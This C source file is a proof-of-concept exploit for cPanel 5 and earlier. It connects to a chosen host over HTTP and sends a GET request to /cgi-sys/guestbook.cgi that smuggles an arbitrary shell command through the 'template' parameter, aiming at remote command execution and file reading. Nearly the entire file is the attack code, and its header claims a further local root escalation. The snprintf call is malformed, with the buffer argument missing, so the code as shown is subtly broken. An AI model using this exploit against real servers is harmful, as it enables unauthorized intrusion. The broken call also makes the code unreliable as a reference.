/*
 * DSR-cpanel.c by bob@dtors.net
 * Vulnerbility found by Polkeyzz
 * 
 * This is a Proof of Concept exploit for
 * the cpanel 5 and below. Problem is a open()
 * in guestbook.cgi.
 * 
 * User may view any file or execute commands.
 * There also exists a local vulnerbility to
 * escalate privileges to root.
 * 
 * PoC by bob of dtors.net
 */

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>


int main(int argc, char *argv[]) {

int sock;
char exp[75];

struct in_addr addr;
struct sockaddr_in sin;
struct hostent *bob;
 

fprintf(stdout, "\n\tDSR-cpanel.c By bob.\n"); 
fprintf(stdout, "Proof Of Concept Code for cpanel 5.0 <\n");
fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n");
 
if(argc<3) 
  {
   fprintf(stderr, "\nUsage : %s <host> <command>\n\n", argv[0]);
   exit(1);
  } 

 

if ((bob=gethostbyname(argv[1])) == NULL)
   {
   fprintf(stderr, "Socket Error!\n\n");
   exit(1);
   }


sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(bob->h_addr, (char *)&sin.sin_addr, bob->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);



fprintf(stdout, "Connecting...\n");
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
     {
     fprintf(stderr, "...Problem Connecting, Exited.\n");
     exit(1);
     }

else {

snprintf(sizeof(exp)-1, "GET /cgi-sys/guestbook.cgi/user=cpanel&template=%s HTTP/1.1\r\nHost: %s\r\n\r\n" ,argv[2], argv[1]);    
write(sock,exp,strlen(exp));

fprintf(stdout, "Command sent/executed!\n\n");


close(sock);
exit (0);

}

}